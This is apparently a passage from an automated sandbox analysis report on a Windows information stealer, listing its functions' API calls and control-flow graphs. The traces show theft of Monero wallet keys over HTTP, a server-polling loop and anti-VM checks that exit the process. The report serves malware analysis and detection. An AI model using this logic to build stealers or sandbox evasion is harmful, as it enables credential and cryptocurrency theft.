                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,007D0DDE,00000000,?,?,00000000,?,",00000000,?,0165F2B0), ref: 007B4E38
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007B4E54
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 007B4E68
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007B4E99
                                        • InternetCloseHandle.WININET(00000000), ref: 007B4EFD
                                        • InternetCloseHandle.WININET(00000000), ref: 007B4F15
                                        • HttpOpenRequestA.WININET(00000000,0165F380,?,0165ECD0,00000000,00000000,00400100,00000000), ref: 007B4B65
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                        • InternetCloseHandle.WININET(00000000), ref: 007B4F1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 460715078-2180234286
                                        • Opcode ID: 1a5ed569b930079d8e50478728128188cefe773d6a173c3c719b4f3c665e6604
                                        • Instruction ID: 07241186ffa65359442f6b8899843c4d4341c621a7816adbb84379243477301d
                                        • Opcode Fuzzy Hash: 1a5ed569b930079d8e50478728128188cefe773d6a173c3c719b4f3c665e6604
                                        • Instruction Fuzzy Hash: A812ECB291021CEACB14EB90DDAAFEEB37AAF14305F50419DB10662191DF786F48CB65
                                        Function 007C5760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1090 7c5760-7c57c7 call 7c5d20 call 7cab30 * 3 call 7caa50 * 4 1106 7c57cc-7c57d3 1090->1106 1107 7c57d5-7c5806 call 7cab30 call 7caab0 call 7b1590 call 7c5440 1106->1107 1108 7c5827-7c589c call 7caa50 * 2 call 7b1590 call 7c5510 call 7cabb0 call 7cab10 call 7cade0 StrCmpCA 1106->1108 1124 7c580b-7c5822 call 7cabb0 call 7cab10 1107->1124 1134 7c58e3-7c58f9 call 7cade0 StrCmpCA 1108->1134 1138 7c589e-7c58de call 7caab0 call 7b1590 call 7c5440 call 7cabb0 call 7cab10 1108->1138 1124->1134 1139 7c5a2c-7c5a94 call 7cabb0 call 7cab30 * 2 call 7b16b0 call 7cab10 * 4 call 7b1670 call 7b1550 1134->1139 1140 7c58ff-7c5906 1134->1140 1138->1134 1269 7c5d13-7c5d16 1139->1269 1142 7c590c-7c5913 1140->1142 1143 7c5a2a-7c5aaf call 7cade0 StrCmpCA 1140->1143 1147 7c596e-7c59e3 call 7caa50 * 2 call 7b1590 call 7c5510 call 7cabb0 call 7cab10 call 7cade0 StrCmpCA 1142->1147 1148 7c5915-7c5969 call 7cab30 call 7caab0 call 7b1590 call 7c5440 call 7cabb0 call 7cab10 1142->1148 1162 7c5ab5-7c5abc 1143->1162 1163 7c5be1-7c5c49 call 7cabb0 call 7cab30 * 2 call 7b16b0 call 7cab10 * 4 call 7b1670 call 7b1550 1143->1163 1147->1143 1246 7c59e5-7c5a25 call 7caab0 call 7b1590 call 7c5440 call 7cabb0 call 7cab10 1147->1246 1148->1143 1169 7c5bdf-7c5c64 call 7cade0 StrCmpCA 1162->1169 1170 7c5ac2-7c5ac9 1162->1170 1163->1269 1198 7c5c78-7c5ce1 call 7cabb0 call 7cab30 * 2 call 7b16b0 call 7cab10 * 4 call 7b1670 call 7b1550 1169->1198 1199 7c5c66-7c5c71 Sleep 1169->1199 1177 7c5acb-7c5b1e call 7cab30 call 7caab0 call 7b1590 call 7c5440 call 7cabb0 call 7cab10 1170->1177 1178 7c5b23-7c5b98 call 7caa50 * 2 call 7b1590 call 7c5510 call 7cabb0 call 7cab10 call 7cade0 StrCmpCA 1170->1178 1177->1169 1178->1169 1275 7c5b9a-7c5bda call 7caab0 call 7b1590 call 7c5440 call 7cabb0 call 7cab10 1178->1275 1198->1269 1199->1106 1246->1143 1275->1169
                                        APIs
                                          • Part of subcall function 007CAB30: lstrlen.KERNEL32(007B4F55,?,?,007B4F55,007D0DDF), ref: 007CAB3B
                                          • Part of subcall function 007CAB30: lstrcpy.KERNEL32(007D0DDF,00000000), ref: 007CAB95
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007C5894
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007C58F1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007C5AA7
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007C5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007C5478
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007C5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007C5568
                                          • Part of subcall function 007C5510: lstrlen.KERNEL32(00000000), ref: 007C557F
                                          • Part of subcall function 007C5510: StrStrA.SHLWAPI(00000000,00000000), ref: 007C55B4
                                          • Part of subcall function 007C5510: lstrlen.KERNEL32(00000000), ref: 007C55D3
                                          • Part of subcall function 007C5510: lstrlen.KERNEL32(00000000), ref: 007C55FE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007C59DB
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007C5B90
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007C5C5C
                                        • Sleep.KERNEL32(0000EA60), ref: 007C5C6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleep
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 507064821-2791005934
                                        • Opcode ID: c38e8760d2bb3db2a27486f73b52fef05d3ae3c5d8b3880003e66ab8abc2965c
                                        • Instruction ID: 78939fbf98193c7a4bebe263aeba877d6ea3eb03d121bdd9a0f4e15216df810e
                                        • Opcode Fuzzy Hash: c38e8760d2bb3db2a27486f73b52fef05d3ae3c5d8b3880003e66ab8abc2965c
                                        • Instruction Fuzzy Hash: 80E133B1910508EACB14FBA0ED6AFED733DAF54305F40855CB50666191EF39AF48CB62
                                        Function 007C19F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1301 7c19f0-7c1a1d call 7cade0 StrCmpCA 1304 7c1a1f-7c1a21 ExitProcess 1301->1304 1305 7c1a27-7c1a41 call 7cade0 1301->1305 1309 7c1a44-7c1a48 1305->1309 1310 7c1a4e-7c1a61 1309->1310 1311 7c1c12-7c1c1d call 7cab10 1309->1311 1312 7c1bee-7c1c0d 1310->1312 1313 7c1a67-7c1a6a 1310->1313 1312->1309 1316 7c1afd-7c1b0e StrCmpCA 1313->1316 1317 7c1b1f-7c1b30 StrCmpCA 1313->1317 1318 7c1bdf-7c1be9 call 7cab30 1313->1318 1319 7c1a99-7c1aa8 call 7cab30 1313->1319 1320 7c1a71-7c1a80 call 7cab30 1313->1320 1321 7c1aad-7c1abe StrCmpCA 1313->1321 1322 7c1acf-7c1ae0 StrCmpCA 1313->1322 1323 7c1a85-7c1a94 call 7cab30 1313->1323 1324 7c1bc0-7c1bd1 StrCmpCA 1313->1324 1325 7c1b41-7c1b52 StrCmpCA 1313->1325 1326 7c1ba1-7c1bb2 StrCmpCA 1313->1326 1327 7c1b82-7c1b93 StrCmpCA 1313->1327 1328 7c1b63-7c1b74 StrCmpCA 1313->1328 1331 7c1b1a 1316->1331 1332 7c1b10-7c1b13 1316->1332 1333 7c1b3c 1317->1333 1334 7c1b32-7c1b35 1317->1334 1318->1312 1319->1312 1320->1312 1350 7c1aca 1321->1350 1351 7c1ac0-7c1ac3 1321->1351 1329 7c1aee-7c1af1 1322->1329 1330 7c1ae2-7c1aec 1322->1330 1323->1312 1344 7c1bdd 1324->1344 1345 7c1bd3-7c1bd6 1324->1345 1335 7c1b5e 1325->1335 1336 7c1b54-7c1b57 1325->1336 1341 7c1bbe 1326->1341 1342 7c1bb4-7c1bb7 1326->1342 1339 7c1b9f 1327->1339 1340 7c1b95-7c1b98 1327->1340 1337 7c1b76-7c1b79 1328->1337 1338 7c1b80 1328->1338 1352 7c1af8 1329->1352 1330->1352 1331->1312 1332->1331 1333->1312 1334->1333 1335->1312 1336->1335 1337->1338 1338->1312 1339->1312 1340->1339 1341->1312 1342->1341 1344->1312 1345->1344 1350->1312 1351->1350 1352->1312
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 007C1A15
                                        • ExitProcess.KERNEL32 ref: 007C1A21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: block
                                        • API String ID: 621844428-2199623458
                                        • Opcode ID: 3f4555291b9fa067704dd4b085bcb56b4feee1b77cc019edf67490f452e16229
                                        • Instruction ID: c0d25f593ebae8f323b6f8fa693ef1d160ee4fa9649abb554c0debed769ccb8a
                                        • Opcode Fuzzy Hash: 3f4555291b9fa067704dd4b085bcb56b4feee1b77cc019edf67490f452e16229
                                        • Instruction Fuzzy Hash: E35108B4B08209EBCB14DF94D958FAE77BAAF45704F60806DF402AB251E778ED41CB61
                                        Function 007C6C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01651510), ref: 007C9BF1
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,016515A0), ref: 007C9C0A
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,016516C0), ref: 007C9C22
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01651720), ref: 007C9C3A
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01651528), ref: 007C9C53
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01658B08), ref: 007C9C6B
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01645088), ref: 007C9C83
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01645328), ref: 007C9C9C
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01651570), ref: 007C9CB4
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,016516D8), ref: 007C9CCC
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01651588), ref: 007C9CE5
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01651738), ref: 007C9CFD
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01645208), ref: 007C9D15
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,016515B8), ref: 007C9D2E
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007B11D0: ExitProcess.KERNEL32 ref: 007B1211
                                          • Part of subcall function 007B1160: GetSystemInfo.KERNEL32(?), ref: 007B116A
                                          • Part of subcall function 007B1160: ExitProcess.KERNEL32 ref: 007B117E
                                          • Part of subcall function 007B1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007B112B
                                          • Part of subcall function 007B1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 007B1132
                                          • Part of subcall function 007B1110: ExitProcess.KERNEL32 ref: 007B1143
                                          • Part of subcall function 007B1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 007B123E
                                          • Part of subcall function 007B1220: __aulldiv.LIBCMT ref: 007B1258
                                          • Part of subcall function 007B1220: __aulldiv.LIBCMT ref: 007B1266
                                          • Part of subcall function 007B1220: ExitProcess.KERNEL32 ref: 007B1294
                                          • Part of subcall function 007C6A10: GetUserDefaultLangID.KERNEL32 ref: 007C6A14
                                          • Part of subcall function 007B1190: ExitProcess.KERNEL32 ref: 007B11C6
                                          • Part of subcall function 007C79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007B11B7), ref: 007C7A10
                                          • Part of subcall function 007C79E0: RtlAllocateHeap.NTDLL(00000000), ref: 007C7A17
                                          • Part of subcall function 007C79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 007C7A2F
                                          • Part of subcall function 007C7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007C7AA0
                                          • Part of subcall function 007C7A70: RtlAllocateHeap.NTDLL(00000000), ref: 007C7AA7
                                          • Part of subcall function 007C7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 007C7ABF
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01658B98,?,007D10F4,?,00000000,?,007D10F8,?,00000000,007D0AF3), ref: 007C6D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007C6D88
                                        • CloseHandle.KERNEL32(00000000), ref: 007C6D99
                                        • Sleep.KERNEL32(00001770), ref: 007C6DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,01658B98,?,007D10F4,?,00000000,?,007D10F8,?,00000000,007D0AF3), ref: 007C6DBA
                                        • ExitProcess.KERNEL32 ref: 007C6DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2525456742-0
                                        • Opcode ID: 5bfb5f4b7edceef2a11cc6228dab8cbb29f3a99ba1321094d669e8fe89ae284f
                                        • Instruction ID: a822519cfa190d95f4f67fa955be1311f361cb8b8a0738f71b35c9eda602dc6d
                                        • Opcode Fuzzy Hash: 5bfb5f4b7edceef2a11cc6228dab8cbb29f3a99ba1321094d669e8fe89ae284f
                                        • Instruction Fuzzy Hash: 1731F8B1A0420CEACB04FBE0DCAEFEE7379AF14705F50495DF212A6192DF7869058766
                                        Function 007B1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1436 7b1220-7b1247 call 7c8b40 GlobalMemoryStatusEx 1439 7b1249-7b1271 call 7cdd30 * 2 1436->1439 1440 7b1273-7b127a 1436->1440 1441 7b1281-7b1285 1439->1441 1440->1441 1443 7b129a-7b129d 1441->1443 1444 7b1287 1441->1444 1446 7b1289-7b1290 1444->1446 1447 7b1292-7b1294 ExitProcess 1444->1447 1446->1443 1446->1447
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 007B123E
                                        • __aulldiv.LIBCMT ref: 007B1258
                                        • __aulldiv.LIBCMT ref: 007B1266
                                        • ExitProcess.KERNEL32 ref: 007B1294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 3404098578-2766056989
                                        • Opcode ID: 17eba481f645fcd1e6b299ff4c4e4f80cfb4e54f68e9951dd3d26e935f9563ee
                                        • Instruction ID: d801fd8a0453d9d3d57de08b1a86c1e3f8da6a9c56b2e1b42523bf07f1507bd6
                                        • Opcode Fuzzy Hash: 17eba481f645fcd1e6b299ff4c4e4f80cfb4e54f68e9951dd3d26e935f9563ee
                                        • Instruction Fuzzy Hash: B6016DB0E40308FAEB10DFE0CC5AFEEBB78BB14705FA08459F605BA1C0D6B899418759
                                        Function 007C6D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1450 7c6d93 1451 7c6daa 1450->1451 1453 7c6dac-7c6dc2 call 7c6bc0 call 7c5d60 CloseHandle ExitProcess 1451->1453 1454 7c6d5a-7c6d77 call 7cade0 OpenEventA 1451->1454 1459 7c6d79-7c6d91 call 7cade0 CreateEventA 1454->1459 1460 7c6d95-7c6da4 CloseHandle Sleep 1454->1460 1459->1453 1460->1451
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01658B98,?,007D10F4,?,00000000,?,007D10F8,?,00000000,007D0AF3), ref: 007C6D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007C6D88
                                        • CloseHandle.KERNEL32(00000000), ref: 007C6D99
                                        • Sleep.KERNEL32(00001770), ref: 007C6DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,01658B98,?,007D10F4,?,00000000,?,007D10F8,?,00000000,007D0AF3), ref: 007C6DBA
                                        • ExitProcess.KERNEL32 ref: 007C6DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: d9fa232a5445451b32881fdd4c9d181197175a9049a8f6cee32a7ba96fdc4687
